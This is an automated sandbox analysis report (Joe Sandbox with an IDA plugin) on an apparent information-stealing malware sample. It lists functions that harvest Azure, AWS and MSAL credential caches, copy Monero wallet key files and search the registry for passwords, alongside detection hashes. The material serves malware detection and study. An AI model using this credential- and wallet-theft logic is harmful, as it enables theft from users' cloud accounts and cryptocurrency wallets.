Part of subcall function 008252C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00825318
Part of subcall function 008252C0: lstrlen.KERNEL32(00000000), ref: 0082532F
Part of subcall function 008252C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00825364
Part of subcall function 008252C0: lstrlen.KERNEL32(00000000), ref: 00825383
Part of subcall function 008252C0: lstrlen.KERNEL32(00000000), ref: 008253AE

StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0082578B
StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00825940
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00825A0C
Sleep.KERNEL32(0000EA60), ref: 00825A1B

Strings

ERROR, xrefs: 008259FE
ERROR, xrefs: 0082577D
ERROR, xrefs: 00825636
ERROR, xrefs: 00825849
@e, xrefs: 00825585, 008255E3
ERROR, xrefs: 00825693
ERROR, xrefs: 00825932

Memory Dump Source

Source File: 00000000.00000002.2320615612.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.2320593893.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.0000000000898000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000089F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008C1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008CD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000A6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000CD5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000CF9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000D02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000D10000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321377054.0000000000D11000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321580502.0000000000EB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321597503.0000000000EB1000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_file.jbxd

Yara matches

Similarity

API ID: lstrcpylstrlen$Sleep
String ID: @e$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
API String ID: 507064821-2252645859
Opcode ID: d80209365d7d83f5ab3db1fb2406c6689de5192a8aca1b6587c985849c376dc6
Instruction ID: a8b046483b5ecd75efcde2c3b5dafe2a3ad07e6f775fd82a700b12b2cc9f353b
Opcode Fuzzy Hash: d80209365d7d83f5ab3db1fb2406c6689de5192a8aca1b6587c985849c376dc6
Instruction Fuzzy Hash: C2E100719102189BCB18FBA8FD969ED7378FF54301F508128F506D6195EF346A8ACB93

Function 00828320 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 196registryCOMMON

Download Yara Rule

APIs

Part of subcall function 0082A740: lstrcpy.KERNEL32(00830E17,00000000), ref: 0082A788

RegOpenKeyExA.KERNEL32(00000000,00EFB080,00000000,00020019,00000000,008305B6), ref: 008283A4
RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00828426
wsprintfA.USER32 ref: 00828459
RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 0082847B
RegCloseKey.ADVAPI32(00000000), ref: 0082848C
RegCloseKey.ADVAPI32(00000000), ref: 00828499

Part of subcall function 0082A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0082A7E6

Strings

- , xrefs: 008285A3
%s\%s, xrefs: 0082844D
?, xrefs: 0082837A

Memory Dump Source

Source File: 00000000.00000002.2320615612.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.2320593893.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.0000000000898000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000089F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008C1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008CD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000A6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000CD5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000CF9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000D02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000D10000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321377054.0000000000D11000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321580502.0000000000EB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321597503.0000000000EB1000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_file.jbxd

Yara matches

Similarity

API ID: CloseOpenlstrcpy$Enumwsprintf
String ID: - $%s\%s$?
API String ID: 3246050789-3278919252
Opcode ID: 1bf17f351f218f53b832dc6e024a221a3b749fe177e996aa6fedf8ae90c6faae
Instruction ID: f22506dcb9f8dd11c6395b4b0f90e699d062ce48d7facc9f6ed2ad95dba1ffe2
Opcode Fuzzy Hash: 1bf17f351f218f53b832dc6e024a221a3b749fe177e996aa6fedf8ae90c6faae
Instruction Fuzzy Hash: 0F810BB1911228ABDB28DB54DC95FEAB7B8FF58700F008698E109A6140DF756BC6CF91

Function 00824D70 Relevance: 22.6, APIs: 6, Strings: 9, Instructions: 123stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00828DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00828E0B

lstrcat.KERNEL32(?,00000000), ref: 00824DB0
lstrcat.KERNEL32(?,\.azure\), ref: 00824DCD

Part of subcall function 00824910: wsprintfA.USER32 ref: 0082492C
Part of subcall function 00824910: FindFirstFileA.KERNEL32(?,?), ref: 00824943

lstrcat.KERNEL32(?,00000000), ref: 00824E3C
lstrcat.KERNEL32(?,\.aws\), ref: 00824E59

Part of subcall function 00824910: StrCmpCA.SHLWAPI(?,00830FDC), ref: 00824971
Part of subcall function 00824910: StrCmpCA.SHLWAPI(?,00830FE0), ref: 00824987
Part of subcall function 00824910: FindNextFileA.KERNEL32(000000FF,?), ref: 00824B7D
Part of subcall function 00824910: FindClose.KERNEL32(000000FF), ref: 00824B92

lstrcat.KERNEL32(?,00000000), ref: 00824EC8
lstrcat.KERNEL32(?,\.IdentityService\), ref: 00824EE5

Part of subcall function 00824910: wsprintfA.USER32 ref: 008249B0
Part of subcall function 00824910: StrCmpCA.SHLWAPI(?,008308D2), ref: 008249C5
Part of subcall function 00824910: wsprintfA.USER32 ref: 008249E2
Part of subcall function 00824910: PathMatchSpecA.SHLWAPI(?,?), ref: 00824A1E
Part of subcall function 00824910: lstrcat.KERNEL32(?,00EFE260), ref: 00824A4A
Part of subcall function 00824910: lstrcat.KERNEL32(?,00830FF8), ref: 00824A5C
Part of subcall function 00824910: lstrcat.KERNEL32(?,?), ref: 00824A70
Part of subcall function 00824910: lstrcat.KERNEL32(?,00830FFC), ref: 00824A82
Part of subcall function 00824910: lstrcat.KERNEL32(?,?), ref: 00824A96
Part of subcall function 00824910: CopyFileA.KERNEL32(?,?,00000001), ref: 00824AAC
Part of subcall function 00824910: DeleteFileA.KERNEL32(?), ref: 00824B31

Strings

msal.cache, xrefs: 00824EF0
*.*, xrefs: 00824E64
\.azure\, xrefs: 00824DC1
*.*, xrefs: 00824DD8
\.IdentityService\, xrefs: 00824ED9
Azure\.IdentityService, xrefs: 00824EEB
Azure\.azure, xrefs: 00824DD3
\.aws\, xrefs: 00824E4D
Azure\.aws, xrefs: 00824E5F

Memory Dump Source

Source File: 00000000.00000002.2320615612.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.2320593893.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.0000000000898000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000089F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008C1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008CD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000A6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000CD5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000CF9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000D02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000D10000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321377054.0000000000D11000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321580502.0000000000EB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321597503.0000000000EB1000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
API String ID: 949356159-974132213
Opcode ID: de2761fda7e8637c93627bc24c6a57d602b65e7b09c12e1b7d5b69b606c3e64f
Instruction ID: bea9b86a8b0fb1c48edc0ead6b7df59478bfe70811d3febff769894faef803d4
Opcode Fuzzy Hash: de2761fda7e8637c93627bc24c6a57d602b65e7b09c12e1b7d5b69b606c3e64f
Instruction Fuzzy Hash: 1D4181BA94021467CB54E770EC9BFED3238FB64700F404554B64AE61C1EEB95BC98B93

Function 00811310 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 141stringfileCOMMON

Download Yara Rule

APIs

Part of subcall function 008112A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 008112B4
Part of subcall function 008112A0: RtlAllocateHeap.NTDLL(00000000), ref: 008112BB
Part of subcall function 008112A0: RegOpenKeyExA.KERNEL32(000000FF,?,00000000,00020119,?), ref: 008112D7
Part of subcall function 008112A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 008112F5
Part of subcall function 008112A0: RegCloseKey.ADVAPI32(?), ref: 008112FF

lstrcat.KERNEL32(?,00000000), ref: 0081134F
lstrlen.KERNEL32(?), ref: 0081135C
lstrcat.KERNEL32(?,.keys), ref: 00811377

Part of subcall function 0082A740: lstrcpy.KERNEL32(00830E17,00000000), ref: 0082A788

Part of subcall function 0082A9B0: lstrlen.KERNEL32(?,00EF8A10,?,\Monero\wallet.keys,00830E17), ref: 0082A9C5
Part of subcall function 0082A9B0: lstrcpy.KERNEL32(00000000), ref: 0082AA04
Part of subcall function 0082A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0082AA12

Part of subcall function 0082A8A0: lstrcpy.KERNEL32(?,00830E17), ref: 0082A905

Part of subcall function 00828B60: GetSystemTime.KERNEL32(00830E1A,00EF9A98,008305AE,?,?,008113F9,?,0000001A,00830E1A,00000000,?,00EF8A10,?,\Monero\wallet.keys,00830E17), ref: 00828B86

Part of subcall function 0082A920: lstrcpy.KERNEL32(00000000,?), ref: 0082A972
Part of subcall function 0082A920: lstrcat.KERNEL32(00000000), ref: 0082A982

CopyFileA.KERNEL32(?,00000000,00000001), ref: 00811465

Part of subcall function 0082A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0082A7E6

Part of subcall function 008199C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 008199EC
Part of subcall function 008199C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00819A11
Part of subcall function 008199C0: LocalAlloc.KERNEL32(00000040,?), ref: 00819A31
Part of subcall function 008199C0: ReadFile.KERNEL32(000000FF,?,00000000,0081148F,00000000), ref: 00819A5A
Part of subcall function 008199C0: LocalFree.KERNEL32(0081148F), ref: 00819A90
Part of subcall function 008199C0: CloseHandle.KERNEL32(000000FF), ref: 00819A9A

DeleteFileA.KERNEL32(00000000), ref: 008114EF

Strings

wallet_path, xrefs: 00811330
SOFTWARE\monero-project\monero-core, xrefs: 00811335
\Monero\wallet.keys, xrefs: 0081138D
.keys, xrefs: 0081136B

Memory Dump Source

Source File: 00000000.00000002.2320615612.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.2320593893.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.0000000000898000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000089F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008C1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008CD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000A6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000CD5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000CF9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000D02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000D10000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321377054.0000000000D11000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321580502.0000000000EB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321597503.0000000000EB1000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_file.jbxd

Yara matches

Similarity

API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
API String ID: 3478931302-218353709
Opcode ID: 027d74c9b95a5c0866fb1ab52f5819ebeaf9600a05b2861399055be00de3d0db
Instruction ID: 8a3ca49a034682f7c1c03b9dd0df154c4e8f9b4a089a55c7b8de68aa0467f5db
Opcode Fuzzy Hash: 027d74c9b95a5c0866fb1ab52f5819ebeaf9600a05b2861399055be00de3d0db
Instruction Fuzzy Hash: 5C5136B19501295BCB19EB64EC96BED737CFF54700F4045A8B60AE2081EE345BC5CAA7

Function 008175D0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON

Download Yara Rule

APIs

Part of subcall function 008172D0: RegOpenKeyExA.KERNEL32(80000001,?,00000000,00020019,?), ref: 0081733A
Part of subcall function 008172D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 008173B1
Part of subcall function 008172D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0081740D
Part of subcall function 008172D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00817452
Part of subcall function 008172D0: HeapFree.KERNEL32(00000000), ref: 00817459

lstrcat.KERNEL32(359B0020,008317FC), ref: 00817606
lstrcat.KERNEL32(359B0020,00000000), ref: 00817648
lstrcat.KERNEL32(359B0020, : ), ref: 0081765A
lstrcat.KERNEL32(359B0020,00000000), ref: 0081768F
lstrcat.KERNEL32(359B0020,00831804), ref: 008176A0
lstrcat.KERNEL32(359B0020,00000000), ref: 008176D3
lstrcat.KERNEL32(359B0020,00831808), ref: 008176ED
task.LIBCPMTD ref: 008176FB

Strings

: , xrefs: 0081764E

Memory Dump Source

Source File: 00000000.00000002.2320615612.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.2320593893.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.0000000000898000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000089F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008C1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008CD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000A6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000CD5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000CF9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000D02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000D10000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321377054.0000000000D11000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321580502.0000000000EB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321597503.0000000000EB1000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
String ID: :
API String ID: 2677904052-3653984579
Opcode ID: 6448ee5f4e3401d116938ac8311f847ad581bd63b653af3a56d38d980a5af437
Instruction ID: ad4752980dea818820eaab6d73aaa75fcf94c73467008668b40c8d9b73a81a50
Opcode Fuzzy Hash: 6448ee5f4e3401d116938ac8311f847ad581bd63b653af3a56d38d980a5af437
Instruction Fuzzy Hash: 0531E172A00209EBCB04EBE8DC56DEE7779FF64302F144118E116E7251DA35A987CB52

Function 00827500 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 106memoryCOMMON

Download Yara Rule

APIs

GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00827542
GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0082757F
GetProcessHeap.KERNEL32(00000000,00000104), ref: 00827603
RtlAllocateHeap.NTDLL(00000000), ref: 0082760A
wsprintfA.USER32 ref: 00827640

Part of subcall function 0082A740: lstrcpy.KERNEL32(00830E17,00000000), ref: 0082A788

Strings

\, xrefs: 00827560
:, xrefs: 0082755C
C, xrefs: 0082754C

Memory Dump Source

Source File: 00000000.00000002.2320615612.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.2320593893.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.0000000000898000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000089F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008C1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008CD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000A6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000CD5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000CF9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000D02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000D10000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321377054.0000000000D11000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321580502.0000000000EB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321597503.0000000000EB1000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
String ID: :$C$\
API String ID: 1544550907-3809124531
Opcode ID: 059c14c2a1221155b503233de4a785bfe60b7a1a204bafd19185f33baebb8432
Instruction ID: 880e27bdef710946d165fd245c72cb021950294404e2c6fdd4e5b69b1330494b
Opcode Fuzzy Hash: 059c14c2a1221155b503233de4a785bfe60b7a1a204bafd19185f33baebb8432
Instruction Fuzzy Hash: F54171B1904358ABDF10DF98DC45BDEBBB8FF18704F100199F509A7280D7746A84CBA6

Function 008172D0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 149registrymemoryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNEL32(80000001,?,00000000,00020019,?), ref: 0081733A
RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 008173B1
StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0081740D
GetProcessHeap.KERNEL32(00000000,?), ref: 00817452
HeapFree.KERNEL32(00000000), ref: 00817459
task.LIBCPMTD ref: 00817555

Strings

Password, xrefs: 00817401

Memory Dump Source

Source File: 00000000.00000002.2320615612.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.2320593893.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
